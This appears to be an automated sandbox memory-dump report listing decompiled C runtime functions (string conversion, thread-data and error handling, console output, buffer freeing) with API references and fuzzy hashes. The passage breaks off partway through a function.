                                                                                                                                                                                                                                0x736da635
                                                                                                                                                                                                                                0x736da638
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63e
                                                                                                                                                                                                                                0x736da641
                                                                                                                                                                                                                                0x736da643
                                                                                                                                                                                                                                0x736da645
                                                                                                                                                                                                                                0x736da647
                                                                                                                                                                                                                                0x736da64c
                                                                                                                                                                                                                                0x736da64d
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da651

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID: *?
                                                                                                                                                                                                                                • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                • Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
                                                                                                                                                                                                                                • Instruction ID: 15dcc314aeeddb05f5ee9c0b6508e268adee9202471e1a7ab2ecf7d7b893703f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F615EB5D142199FDF15CFA9C9806EDFBF9EF48310B18816AD815E7380E635DE418B90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DA397(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                                                                                				intOrPtr _t16;
                                                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                				char _t31;
                                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t40 = _a4;
                                                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                                                					_t31 = 0;
                                                                                                                                                                                                                                					__eflags =  *_t40;
                                                                                                                                                                                                                                					if( *_t40 != 0) {
                                                                                                                                                                                                                                						_t16 = E736DB595(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                                                                                						__eflags = _t16;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							_t38 = _a8;
                                                                                                                                                                                                                                							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
                                                                                                                                                                                                                                							if(__eflags <= 0) {
                                                                                                                                                                                                                                								L11:
                                                                                                                                                                                                                                								_t17 = E736DB595(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
                                                                                                                                                                                                                                								__eflags = _t17;
                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
                                                                                                                                                                                                                                									_t19 = 0;
                                                                                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									E736DA1ED(GetLastError());
                                                                                                                                                                                                                                									_t19 =  *((intOrPtr*)(E736DA223(__eflags)));
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                                								return _t19;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t19 = E736DA9DD(_t38, __eflags, _t16);
                                                                                                                                                                                                                                							__eflags = _t19;
                                                                                                                                                                                                                                							if(_t19 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E736DA1ED(GetLastError());
                                                                                                                                                                                                                                						return  *((intOrPtr*)(E736DA223(__eflags)));
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t41 = _a8;
                                                                                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t41 + 0xc));
                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t29 = E736DA9DD(_t41, __eflags, 1);
                                                                                                                                                                                                                                					__eflags = _t29;
                                                                                                                                                                                                                                					if(_t29 != 0) {
                                                                                                                                                                                                                                						return _t29;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _a8;
                                                                                                                                                                                                                                				E736DA9C3(_t41);
                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t41 + 8)) = 0;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t41 + 0xc)) = 0;
                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3ba
                                                                                                                                                                                                                                0x736da3d4
                                                                                                                                                                                                                                0x736da3d9
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da465
                                                                                                                                                                                                                                0x736da465
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da3a5
                                                                                                                                                                                                                                0x736da3aa
                                                                                                                                                                                                                                0x736da3af
                                                                                                                                                                                                                                0x736da3b1
                                                                                                                                                                                                                                0x736da3b4
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DA9C3: _free.LIBCMT ref: 736DA9D1
                                                                                                                                                                                                                                  • Part of subcall function 736DB595: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,736DD577,?,00000000,00000000), ref: 736DB637
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 736DA3FF
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA406
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 736DA445
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA44C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 167067550-0
                                                                                                                                                                                                                                • Opcode ID: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction ID: b085ce134d80df771b988b60bb94c99560f4084dbd39e7e15acff4a59fea7bc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221C472628315BFEF119F66CC84B5AB7AEEF042647048514E82AD77C0D730DD1087A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                			E736D9C93(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				intOrPtr _t2;
                                                                                                                                                                                                                                				long _t3;
                                                                                                                                                                                                                                				intOrPtr _t5;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				long _t10;
                                                                                                                                                                                                                                				signed int _t12;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                				long _t56;
                                                                                                                                                                                                                                				long _t60;
                                                                                                                                                                                                                                				long _t61;
                                                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                                				_t43 = __ecx;
                                                                                                                                                                                                                                				_t60 = GetLastError();
                                                                                                                                                                                                                                				_t2 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                				_t67 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
                                                                                                                                                                                                                                					__eflags = _t3;
                                                                                                                                                                                                                                					if(_t3 == 0) {
                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t51 = E736DA236(1, 0x364);
                                                                                                                                                                                                                                						_pop(_t43);
                                                                                                                                                                                                                                						__eflags = _t51;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							__eflags = E736DBC10(__eflags,  *0x736eb050, _t51);
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								E736D9A91(_t51, 0x736efafc);
                                                                                                                                                                                                                                								E736DA293(0);
                                                                                                                                                                                                                                								_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 = 0;
                                                                                                                                                                                                                                								E736DBC10(__eflags,  *0x736eb050, 0);
                                                                                                                                                                                                                                								_push(_t51);
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t39 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							E736DBC10(0,  *0x736eb050, 0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							E736DA293();
                                                                                                                                                                                                                                							_pop(_t43);
                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t51 = E736DBBD1(_t67, _t2);
                                                                                                                                                                                                                                					if(_t51 == 0) {
                                                                                                                                                                                                                                						_t2 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t51 != 0xffffffff) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t39 = _t51;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							L3:
                                                                                                                                                                                                                                							_t39 = 0;
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_t51 = _t39;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetLastError(_t60);
                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                				_t53 =  ~_t51 & _t39;
                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                					E736D9798(_t39, _t43, _t49, _t53, _t60);
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					_t5 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                					_push(_t60);
                                                                                                                                                                                                                                					__eflags = _t5 - 0xffffffff;
                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                						_t6 = E736DBC10(__eflags, _t5, 0xffffffff);
                                                                                                                                                                                                                                						__eflags = _t6;
                                                                                                                                                                                                                                						if(_t6 == 0) {
                                                                                                                                                                                                                                							goto L31;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t60 = E736DA236(1, 0x364);
                                                                                                                                                                                                                                							_pop(_t43);
                                                                                                                                                                                                                                							__eflags = _t60;
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								__eflags = E736DBC10(__eflags,  *0x736eb050, _t60);
                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                									E736D9A91(_t60, 0x736efafc);
                                                                                                                                                                                                                                									E736DA293(0);
                                                                                                                                                                                                                                									_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                									goto L29;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									E736DBC10(__eflags,  *0x736eb050, _t21);
                                                                                                                                                                                                                                									_push(_t60);
                                                                                                                                                                                                                                									goto L25;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								E736DBC10(__eflags,  *0x736eb050, _t20);
                                                                                                                                                                                                                                								_push(_t60);
                                                                                                                                                                                                                                								L25:
                                                                                                                                                                                                                                								E736DA293();
                                                                                                                                                                                                                                								_pop(_t43);
                                                                                                                                                                                                                                								goto L31;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t60 = E736DBBD1(__eflags, _t5);
                                                                                                                                                                                                                                						__eflags = _t60;
                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                							_t5 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                							goto L22;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags = _t60 - 0xffffffff;
                                                                                                                                                                                                                                							if(_t60 == 0xffffffff) {
                                                                                                                                                                                                                                								L31:
                                                                                                                                                                                                                                								E736D9798(_t39, _t43, _t49, _t53, _t60);
                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                								_push(_t39);
                                                                                                                                                                                                                                								_push(_t60);
                                                                                                                                                                                                                                								_push(_t53);
                                                                                                                                                                                                                                								_t61 = GetLastError();
                                                                                                                                                                                                                                								_t9 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                								__eflags = _t9 - 0xffffffff;
                                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                                									L38:
                                                                                                                                                                                                                                									_t10 = E736DBC10(__eflags, _t9, 0xffffffff);
                                                                                                                                                                                                                                									__eflags = _t10;
                                                                                                                                                                                                                                									if(_t10 == 0) {
                                                                                                                                                                                                                                										goto L35;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t12 = E736DA236(1, 0x364); // executed
                                                                                                                                                                                                                                										_t54 = _t12;
                                                                                                                                                                                                                                										__eflags = _t54;
                                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                                											__eflags = E736DBC10(__eflags,  *0x736eb050, _t54);
                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                												E736D9A91(_t54, 0x736efafc);
                                                                                                                                                                                                                                												E736DA293(0);
                                                                                                                                                                                                                                												goto L45;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												_t40 = 0;
                                                                                                                                                                                                                                												E736DBC10(__eflags,  *0x736eb050, 0);
                                                                                                                                                                                                                                												_push(_t54);
                                                                                                                                                                                                                                												goto L41;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t40 = 0;
                                                                                                                                                                                                                                											__eflags = 0;
                                                                                                                                                                                                                                											E736DBC10(0,  *0x736eb050, 0);
                                                                                                                                                                                                                                											_push(0);
                                                                                                                                                                                                                                											L41:
                                                                                                                                                                                                                                											E736DA293();
                                                                                                                                                                                                                                											goto L36;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t54 = E736DBBD1(__eflags, _t9);
                                                                                                                                                                                                                                									__eflags = _t54;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										_t9 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										__eflags = _t54 - 0xffffffff;
                                                                                                                                                                                                                                										if(_t54 != 0xffffffff) {
                                                                                                                                                                                                                                											L45:
                                                                                                                                                                                                                                											_t40 = _t54;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											L35:
                                                                                                                                                                                                                                											_t40 = 0;
                                                                                                                                                                                                                                											__eflags = 0;
                                                                                                                                                                                                                                											L36:
                                                                                                                                                                                                                                											_t54 = _t40;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								SetLastError(_t61);
                                                                                                                                                                                                                                								asm("sbb edi, edi");
                                                                                                                                                                                                                                								_t56 =  ~_t54 & _t40;
                                                                                                                                                                                                                                								__eflags = _t56;
                                                                                                                                                                                                                                								return _t56;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								L29:
                                                                                                                                                                                                                                								__eflags = _t60;
                                                                                                                                                                                                                                								if(_t60 == 0) {
                                                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									return _t60;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					return _t53;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}
























                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e09
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e8d
                                                                                                                                                                                                                                0x736d9e95
                                                                                                                                                                                                                                0x736d9e97
                                                                                                                                                                                                                                0x736d9e97
                                                                                                                                                                                                                                0x736d9e9e
                                                                                                                                                                                                                                0x736d9d6c
                                                                                                                                                                                                                                0x736d9ddc
                                                                                                                                                                                                                                0x736d9ddc
                                                                                                                                                                                                                                0x736d9dde
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9de0
                                                                                                                                                                                                                                0x736d9de3
                                                                                                                                                                                                                                0x736d9de3
                                                                                                                                                                                                                                0x736d9dde
                                                                                                                                                                                                                                0x736d9d6a
                                                                                                                                                                                                                                0x736d9d65
                                                                                                                                                                                                                                0x736d9d44
                                                                                                                                                                                                                                0x736d9d49
                                                                                                                                                                                                                                0x736d9d49

APIs
• GetLastError.KERNEL32(?,?,?,736DDF75,00000000,00000001,736DC385,?,736DE432,00000001,?,?,?,736DC31E,?,00000000), ref: 736D9C98
• _free.LIBCMT ref: 736D9CF5
• _free.LIBCMT ref: 736D9D2B
• SetLastError.KERNEL32(00000000,00000007,000000FF,?,736DE432,00000001,?,?,?,736DC31E,?,00000000,00000000,736E9C70,0000002C,736DC385), ref: 736D9D36
Memory Dump Source
• Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
• Instruction ID: 67a44d6bcc46deb1608fb8d3d85c04aea9b8fb6d16fbc401b6060eff744216a3
• Opcode Fuzzy Hash: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
• Instruction Fuzzy Hash: 7111CA332697053BEF1126B68E88F1B26E9F7C3675B380628F529971C8FE7589054118
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 100%
E736DF176(void* _a4, long _a8, DWORD* _a12) {
    void* _t13;

    _t13 = WriteConsoleW(*0x736eb850, _a4, _a8, _a12, 0);
    if (_t13 == 0 && GetLastError() == 6) {
        E736DF15F();
        E736DF121();
        _t13 = WriteConsoleW(*0x736eb850, _a4, _a8, _a12, _t13);
    }
    return _t13;
}





APIs
• WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001), ref: 736DF18D
• GetLastError.KERNEL32(?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001,?,736DE456,736DC31E), ref: 736DF199
  • Part of subcall function 736DF15F: CloseHandle.KERNEL32(FFFFFFFE,736DF1A9,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001), ref: 736DF16F
• ___initconout.LIBCMT ref: 736DF1A9
  • Part of subcall function 736DF121: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,736DF150,736DEBC2,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF134
• WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF1BE
Memory Dump Source
• Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
• Instruction ID: 95232f7cdbc041a43871ea34cd9a6b5427bee782e7d9b302e20c9f486b7e61d2
• Opcode Fuzzy Hash: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
• Instruction Fuzzy Hash: 03F01C37151259BBCF123FD2CC08B8A3F76FB082B2F144450FA1D9A264DA328820EB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E736D95E1() {

    E736DA293(*0x736efb08);
    *0x736efb08 = 0;
    E736DA293(*0x736efb0c);
    *0x736efb0c = 0;
    E736DA293(*0x736ef7ec);
    *0x736ef7ec = 0;
    E736DA293(*0x736ef7f0);
    *0x736ef7f0 = 0;
    return 1;
}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95EA
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95FD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D960E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D961F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                			E736D8EE0(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char* _v20;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t26;
                                                                                                                                                                                                                                				intOrPtr* _t36;
                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                				signed int _t43;
                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                                				intOrPtr* _t58;
                                                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t57 = __edx;
                                                                                                                                                                                                                                				_t48 = _a4;
                                                                                                                                                                                                                                				if(_t48 != 0) {
                                                                                                                                                                                                                                					__eflags = _t48 - 2;
                                                                                                                                                                                                                                					if(_t48 == 2) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						E736DB1BE(_t48);
                                                                                                                                                                                                                                						E736DAC0B(_t48, _t57, 0, 0x736ef548, 0, 0x736ef548, 0x104);
                                                                                                                                                                                                                                						_t26 =  *0x736ef7f4; // 0x2f133d8
                                                                                                                                                                                                                                						 *0x736ef7e4 = 0x736ef548;
                                                                                                                                                                                                                                						_v20 = _t26;
                                                                                                                                                                                                                                						__eflags = _t26;
                                                                                                                                                                                                                                						if(_t26 == 0) {
                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                							_t26 = 0x736ef548;
                                                                                                                                                                                                                                							_v20 = 0x736ef548;
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							_v8 = 0;
